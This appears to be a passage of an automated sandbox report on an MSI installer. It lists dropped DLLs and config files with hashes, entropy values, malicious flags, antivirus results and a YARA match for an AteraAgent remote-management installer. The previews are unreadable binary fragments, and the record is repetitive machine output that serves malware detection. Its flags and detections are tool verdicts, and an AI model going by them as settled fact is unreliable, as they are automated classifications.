                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI6A36.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI7013.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI7013.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI7013.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61448
                                                                                                                                                                                                                                                                          Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                          MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                          SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                          SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                          SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI87B3.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):521954
                                                                                                                                                                                                                                                                          Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                          MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                          SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                          SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                          SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):25600
                                                                                                                                                                                                                                                                          Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                          MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                          SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                          SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                          SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI87B3.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1538
                                                                                                                                                                                                                                                                          Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                          MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                          SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                          SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                          SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):184240
                                                                                                                                                                                                                                                                          Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                          MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                          SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                          SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                          SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):711952
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                          MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                          SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                          SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                          SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
